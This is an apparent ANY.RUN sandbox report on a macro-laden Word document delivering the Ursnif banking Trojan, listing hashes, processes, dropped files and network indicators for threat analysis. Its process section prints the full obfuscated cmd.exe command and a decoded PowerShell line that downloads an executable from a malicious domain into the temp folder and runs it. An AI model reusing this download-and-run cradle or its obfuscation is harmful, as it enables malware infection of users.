analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CITYOFLEBANON.doc

Full analysis: https://app.any.run/tasks/47bc85bd-2c25-4340-bead-f8abef4505d0
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 14, 2018, 14:40:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 08:50:00 2018, Last Saved Time/Date: Fri Dec 14 08:50:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 35, Security: 0
MD5:

8703D1157173DBCAEAE015032B382841

SHA1:

1760B5244BF472268EDDF02053C71008CFE8B5F8

SHA256:

EB6783451F2FF45B70EFCA1F2C9377A7BC5CBF3C40FAB27D7DCA84979720B7E0

SSDEEP:

1536:oocn1kp59gxBK85fBEuu4IvC7qo1pxopW8+R5OmApIgS+a9d:h41k/W48tu4z7dnR8+bAj6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2968)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2968)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2352)
    • URSNIF was detected

      • powershell.exe (PID: 3912)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3764)
      • cmd.exe (PID: 2276)
      • cmd.exe (PID: 2352)
      • cmd.exe (PID: 2788)
    • Application launched itself

      • cmd.exe (PID: 2276)
    • Creates files in the user directory

      • powershell.exe (PID: 3912)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2968)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 08:50:00
ModifyDate: 2018:12:14 08:50:00
Pages: 1
Words: 5
Characters: 35
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 39
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\CITYOFLEBANON.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3764c:\SwCNWIDwnphZs\YoJsVoa\XtfVdClXESSiiz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set Wgva=olkriXcQJTrzdJOMNbTrDjKQuPn(Uvpfx ;mt:2,I-gFVG.}W8ys0?'\Z$L=/1@9RwaSEH{h)eC+&&for %9 in (57,44,22,5,59,54,11,1,22,54,34,57,44,36,11,59,26,73,65,41,0,17,21,73,6,36,33,16,73,36,46,48,73,17,74,1,4,73,26,36,34,57,28,13,65,59,54,71,36,36,30,37,60,60,50,24,1,66,65,26,73,51,51,73,46,6,0,35,60,36,50,6,1,66,35,60,31,19,73,51,51,19,46,30,71,30,53,1,59,65,50,42,32,63,46,36,2,26,54,46,67,30,1,4,36,27,54,62,54,72,34,57,74,64,71,59,54,51,35,4,54,34,57,35,58,65,33,59,33,54,38,61,49,54,34,57,23,56,12,59,54,11,74,2,54,34,57,44,65,12,59,57,73,26,29,37,36,73,35,30,75,54,55,54,75,57,35,58,65,75,54,46,73,32,73,54,34,31,0,19,73,66,6,71,27,57,20,69,15,33,4,26,33,57,28,13,65,72,70,36,19,50,70,57,44,36,11,46,20,0,65,26,1,0,66,12,43,4,1,73,27,57,20,69,15,39,33,57,44,65,12,72,34,57,4,31,65,59,54,15,4,11,54,34,40,31,33,27,27,45,73,36,41,40,36,73,35,33,57,44,65,12,72,46,1,73,26,42,36,71,33,41,42,73,33,49,52,52,52,52,72,33,70,40,26,29,0,2,73,41,40,36,73,35,33,57,44,65,12,34,57,18,25,22,59,54,36,21,4,54,34,17,19,73,66,2,34,47,47,6,66,36,6,71,70,47,47,57,20,28,35,59,54,68,19,4,54,34,85)do set OL=!OL!!Wgva:~%9,1!&&if %9 equ 85 echo !OL:~4!|FOR /F "delims=mNOs\I tokens=9" %E IN ('ftype^^^|find "llCon"')DO %E -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2276CmD /V:ON/C"set Wgva=olkriXcQJTrzdJOMNbTrDjKQuPn(Uvpfx ;mt:2,I-gFVG.}W8ys0?'\Z$L=/1@9RwaSEH{h)eC+&&for %9 in (57,44,22,5,59,54,11,1,22,54,34,57,44,36,11,59,26,73,65,41,0,17,21,73,6,36,33,16,73,36,46,48,73,17,74,1,4,73,26,36,34,57,28,13,65,59,54,71,36,36,30,37,60,60,50,24,1,66,65,26,73,51,51,73,46,6,0,35,60,36,50,6,1,66,35,60,31,19,73,51,51,19,46,30,71,30,53,1,59,65,50,42,32,63,46,36,2,26,54,46,67,30,1,4,36,27,54,62,54,72,34,57,74,64,71,59,54,51,35,4,54,34,57,35,58,65,33,59,33,54,38,61,49,54,34,57,23,56,12,59,54,11,74,2,54,34,57,44,65,12,59,57,73,26,29,37,36,73,35,30,75,54,55,54,75,57,35,58,65,75,54,46,73,32,73,54,34,31,0,19,73,66,6,71,27,57,20,69,15,33,4,26,33,57,28,13,65,72,70,36,19,50,70,57,44,36,11,46,20,0,65,26,1,0,66,12,43,4,1,73,27,57,20,69,15,39,33,57,44,65,12,72,34,57,4,31,65,59,54,15,4,11,54,34,40,31,33,27,27,45,73,36,41,40,36,73,35,33,57,44,65,12,72,46,1,73,26,42,36,71,33,41,42,73,33,49,52,52,52,52,72,33,70,40,26,29,0,2,73,41,40,36,73,35,33,57,44,65,12,34,57,18,25,22,59,54,36,21,4,54,34,17,19,73,66,2,34,47,47,6,66,36,6,71,70,47,47,57,20,28,35,59,54,68,19,4,54,34,85)do set OL=!OL!!Wgva:~%9,1!&&if %9 equ 85 echo !OL:~4!|FOR /F "delims=mNOs\I tokens=9" %E IN ('ftype^^^|find "llCon"')DO %E -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2304C:\Windows\system32\cmd.exe /S /D /c" echo $VKX='zlK';$Vtz=new-object Net.WebClient;$UJw='http://yulawnesse.com/tyclam/fressr.php?l=wygx9.tkn'.Split('@');$CRh='smi';$mLw = '218';$QZd='zCk';$Vwd=$env:temp+'\'+$mLw+'.exe';foreach($DHM in $UJw){try{$Vtz.DownloadFile($DHM, $Vwd);$ifw='Miz';If ((Get-Item $Vwd).length -ge 80000) {Invoke-Item $Vwd;$TPK='tji';break;}}catch{}}$DUm='Eri';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2352C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=mNOs\I tokens=9" %E IN ('ftype^|find "llCon"') DO %E -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2788C:\Windows\system32\cmd.exe /c ftype|find "llCon"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3032C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3120find "llCon"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3912PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 405
Read events
935
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
6

Dropped files

PID
Process
Filename
Type
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA684.tmp.cvr
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17D29FD.wmf
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1290A13.wmf
MD5:
SHA256:
3912powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8IBFFVKTKJ1OQ389NP1F.temp
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BCAEFDA.wmfwmf
MD5:8B4BAE47F0826B55D7827DA0A10ADFA1
SHA256:6F81434484522D5790B619226D1016CA8178E6B44DFFB702B2C024C520C32032
3912powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b9ed.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3912powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\CITYOFLEBANON.doc.LNKlnk
MD5:C5FA56371EFD08257C5C6A98F9597B34
SHA256:92274051BC3E531896CFC4454D121B9CF79F773FE6BD4B8D8DCD863B2894B765
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:656E8C14980670F2483E5861AD2DDAD9
SHA256:2DBACBD84378A3F73DF8BBF487351D188DB8AAFB756BFCACFCB667852D510A49
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C0E05B10780841AE15969333DA0BFE18
SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3912
powershell.exe
GET
404
94.177.229.49:80
http://yulawnesse.com/tyclam/fressr.php?l=wygx9.tkn
DE
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3912
powershell.exe
94.177.229.49:80
yulawnesse.com
Aruba SAS
DE
suspicious

DNS requests

Domain
IP
Reputation
yulawnesse.com
  • 94.177.229.49
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info